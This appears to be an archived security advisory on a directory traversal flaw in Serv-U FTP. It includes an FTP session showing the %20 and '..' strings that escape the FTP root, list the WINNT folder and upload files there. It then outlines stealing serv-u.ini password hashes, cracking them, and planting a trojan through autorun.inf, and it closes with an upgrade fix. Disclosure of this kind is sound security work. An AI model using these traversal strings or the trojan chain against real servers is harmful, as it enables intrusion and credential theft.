COMMAND
Serv-U
SYSTEMS AFFECTED
Serv-U FTP all versions
PROBLEM
Zoa Chien found following. This was tested on: serv-U ftp 2.4a,
2.5h, 3.0beta,... (all versions ?) Lets just dump what author
tried (skip this):
Normal use: 1.txt is a file in the homedir.
ftp> get 1.txt
200 PORT Command successful.
150 Opening ASCII mode data connection for 1.txt (7 bytes).
226 Transfer complete.
7 bytes received in 0.00 seconds (7000.00 Kbytes/sec)
Lets see what happens to hex codes: %2E=. %31=1 %20=space ...
ftp> get 1%2etxt
200 PORT Command successful.
550 /1%2etxt: No such file or directory.
ftp>
--> %2e is not decoded
ftp> get 1.%20txt
200 PORT Command successful.
550 /1. txt: No such file or directory.
--> %20 is decoded to a space. (to be compatible with browsers)
ftp> get %201.txt
200 PORT Command successful.
150 Opening ASCII mode data connection for 1.txt (7 bytes).
226 Transfer complete.
7 bytes received in 0.00 seconds (7000.00 Kbytes/sec)
--> hey, look if the space is in the beginning of the filename,
it is just skipped.
Lets try this on the cd command:
ftp> cd \.a%20\
550 /.a: No such file or directory.
--> space is skipped again...
ftp> cd \a%20a\
550 /a a: No such file or directory.
ftp>
ftp> cd \a%20.\
550 /a: No such file or directory.
ftp>
--> heh ? wtf, the %20 will remove the .
Lets try to play around with that:
ftp> cd \.%20.
250 Directory changed to /Ftproot
--> Hey, look the ftp client reveals the ftp dir... thats fun
Lets keep playing
ftp> cd \..%20.
250 Directory changed to /..
--> oh ow, this looks like trouble
ftp> dir
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
-rwxrwxrwx 1 user group 1127 Nov 30 22:06 rootdir.txt
...
226 Transfer complete.
1180 bytes received in 0.00 seconds (1180000.00 Kbytes/sec)
ftp>
Ouch, that hurts...
ftp> cd %20..%20%20../winnt\
250 Directory changed to /c:/TOMB/../WINNT
ftp>
You can only use this when you are in your homedir. You can only
use GET ... when you are in your homedir so first changing to
/winnt and then "get" will not work
ftp> put autoexec.bat %20..%20%20../winnt/2.bat
200 PORT Command successful.
150 Opening ASCII mode data connection for 2.bat.
226 Transfer complete.
ftp> dir \..%20.\..%20.\winnt\
Serv-U ftp will reveal the full path to the ftproot with: cd
\.%20 (even if "show path relative to home dir"-option is on)
using pwd will work too, allow read/write/execute/list axx to any
other file on the partition of the ftproot if you have
read/write/exec/list acces on your home dir (note that the option
inherit subdirs must be clicked on - otherwise "cd" will not
work).
Serv-U will allow listing of hidden files, even if "hide hidden
files is on" with "DIR ." The exploit also works on serv-U ftp
2.4a... but you might have to use a different string.: dir
%20..%20%20..\*.
This is a severe bug and should be patched ASAP. If the ftproot
is on the c:drive, serv-U.ini can be retrieved which contains all
passwords of the ftp users (and can be bruted forced with john the
ripper). That way, you could find logins that allow executing...
and you can upload and execute a trojan.
Even if the ftproot is not on the same drive as serv-u.ini, you
can still upload a trojan and letting this trojan execute by
using an autorun.inf on e.g.: d:\ with points to our trojan. If
the sysadmin uses "My Computer" instead of explorer.exe, the
trojan will be executed.
SOLUTION
Upgrade to version 2.5i, available at:
http://ftpserv-u.deerfield.com/download/